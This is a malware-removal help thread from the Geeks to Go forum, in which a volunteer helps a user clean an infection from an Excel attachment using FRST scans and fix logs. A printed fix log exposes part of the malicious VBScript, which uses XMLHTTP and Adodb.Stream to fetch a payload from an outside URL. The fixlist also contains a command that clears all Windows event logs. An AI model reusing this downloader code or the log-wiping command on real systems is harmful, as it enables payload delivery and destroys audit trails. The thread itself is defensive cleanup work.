Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!
Member
Hi!
I recently received a file attached to the work invitation from upwork website and I accidentally opened it. It was a .xls file. The next day I was notified by upwork that the file contained a virus. It infected my computer and avast antivirus could not detect it. I tried to delete the file but it didn't help. what are my options?
Malware Expert
Member
Thank you for your post, RKinner!
Here is what I have from ADWCleaner:
Malware Expert
You have a file:
C:\Users\Joseph\AppData\Roaming\6ov.vbs
I don't know what it does but it looks like it might be malware. A google search doesn't turn up much but there is one site that indicates it's malware.
https://www.hybrid-a...vironmentId=100
It got on your PC on 1/20
Let's look at it and remove it with FRST.
Member
here is the first fix log:
Fix result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
Ran by Joseph (01-02-2017 21:13:44) Run:1
Running from C:\Users\Joseph\Downloads
Loaded Profiles: Joseph (Available Profiles: Joseph)
Boot Mode: Normal
==============================================
fixlist content:
*****************
CloseProcesses:
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
BHO: No Name -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> No File
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
CMD: type C:\Users\Joseph\AppData\Roaming\6ov.vbs
C:\Users\Joseph\AppData\Roaming\6ov.vbs
CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-CF295C30B57B}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
CMD: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
*****************
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => key removed successfully
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => key not found.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF} => key removed successfully
HKCR\CLSID\{B4F3A835-0E21-4959-BA22-42B3008E02FF} => key not found.
ibtsiva => Service stopped successfully.
HKLM\System\CurrentControlSet\Services\ibtsiva => key removed successfully
ibtsiva => service removed successfully
========= type C:\Users\Joseph\AppData\Roaming\6ov.vbs =========
Dim drgfgd, jhgfsf
Set drgfgd = CreateObject("Microsoft.XMLHTTP")
Set jhgfsf = CreateObject("Adodb.Stream")
drgfgd.Open "GET", "http://disk.karelia....etBdl/996.png",False
========= End of CMD: =========
C:\Users\Joseph\AppData\Roaming\6ov.vbs => moved successfully
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-CF295C30B57B} => key removed successfully
========= for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" =========
Failed to clear log AirSpaceChannel. The requested operation cannot be performed over an enabled direct channel. The channel must first be disabled before performing the requested operation.
Failed to clear log Intel-SST-CFD-HDA/IntelSST. The instance name passed was not recognized as valid by a WMI data provider.
Failed to clear log Microsoft-Windows-LiveId/Analytic. Access is denied.
Failed to clear log Microsoft-Windows-LiveId/Operational. Access is denied.
Failed to clear log Microsoft-Windows-USBVideo/Analytic. The instance name passed was not recognized as valid by a WMI data provider.
========= End of CMD: =========
The system needed a reboot.
==== End of Fixlog 21:16:45 ====
Member
here is the FRST
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-01-2017
Ran by Joseph (administrator) on JOSEPHW (01-02-2017 21:30:42)
Running from C:\Users\Joseph\Downloads
Loaded Profiles: Joseph (Available Profiles: Joseph)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
Failed to access process -> IntelCpHDCPSvc.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(HP Development Company, L.P.) C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
(Hewlett-Packard Co.) C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(HP Inc.) C:\Program Files\HPCommRecovery\HPCommRecovery.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.693_none_42ff55c9655f38bf\TiWorker.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9181696 2017-01-13] (Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27262432 2016-12-20] (Skype Technologies S.A.)
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [HP Photosmart 6520 series (NET)] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
HKU\S-1-5-18\...\RunOnce: [Application Restart #0] => C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe [371928 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
Startup: C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-10-31]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{f314d896-c550-4d14-b773-fdf73ec6770f}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
BHO: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-12-28] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-12-28] (Microsoft Corporation)
BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
Toolbar: HKLM - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
FireFox:
========
FF DefaultProfile: y2l2kxa2.default
FF ProfilePath: C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default [2017-02-01]
FF Extension: (Adblock Plus) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-01]
FF Extension: (Diagnostics) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{ed517155-4b2e-41a9-a11a-b6c004d1e42b}\[email protected] [2017-02-01]
FF Extension: (Send HSTS Priming Requests) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{ed517155-4b2e-41a9-a11a-b6c004d1e42b}\[email protected] [2017-02-01]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-01-19]
FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2016-09-05] (Citrix Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-12-28] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2015-12-22] ()
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)
Chrome:
=======
CHR Plugin: (Widevine Content Decryption Module) - C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\WidevineCdm\_platform_specific\win_x64\widevinecdmadapter.dll (Google Inc.)
CHR Plugin: (Shockwave Flash) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.194\pepflashplayer.dll ()
CHR Profile: C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default [2017-02-01]
CHR Extension: (Google Docs) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-09-24]
CHR Extension: (Google Drive) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-24]
CHR Extension: (YouTube) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-22]
CHR Extension: (Bitdefender Wallet) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gannpgaobkkhmpomoijebaigcapoeebl [2017-02-01]
CHR Extension: (Google Docs Offline) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-22]
CHR Extension: (AdBlock) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-01-31]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
CHR Extension: (Gmail) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-22]
CHR Extension: (Chrome Media Router) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-04]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3699904 2016-12-28] (Microsoft Corporation)
S2 cplspcon; C:\WINDOWS\system32\IntelCpHDCPSvc.exe [431088 2016-09-25] (Intel Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
R2 DevMgmtService; C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe [100448 2016-11-29] (Bitdefender)
R2 esifsvc; C:\WINDOWS\SysWoW64\esif_uf.exe [1419424 2016-09-25] (Intel Corporation)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [349728 2015-12-22] (WildTangent)
R2 HP Comm Recover; C:\Program Files\HPCommRecovery\HPCommRecovery.exe [48128 2016-04-18] (HP Inc.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-01-11] (HP Inc.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [19440 2015-11-04] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [356336 2016-09-25] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [976848 2016-01-14] (Intel® Corporation)
S3 Intel® WiDi SAM; C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [19088 2015-09-17] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [209184 2016-02-11] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-08-04] ()
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1100392 2016-10-28] (Bitdefender)
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [322560 2017-01-13] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [266872 2016-08-19] (Synaptics Incorporated)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-01-06] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1526528 2017-02-01] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3732896 2016-08-04] (Intel® Corporation)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
R3 dptf_cpu; C:\WINDOWS\System32\drivers\dptf_cpu.sys [52208 2016-09-25] (Intel Corporation)
R3 esif_lf; C:\WINDOWS\system32\DRIVERS\esif_lf.sys [260080 2016-09-25] (Intel Corporation)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [345872 2016-05-26] (Intel Corporation)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [309280 2016-11-17] (Bitdefender)
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176064 2017-02-01] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-01] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-01] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251848 2017-02-01] (Malwarebytes)
S3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [91584 2017-02-01] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-01] (Malwarebytes)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
U5 Netwtw02; C:\Windows\System32\Drivers\Netwtw02.sys [6724368 2016-02-06] (Intel Corporation)
R3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7308560 2016-09-13] (Intel Corporation)
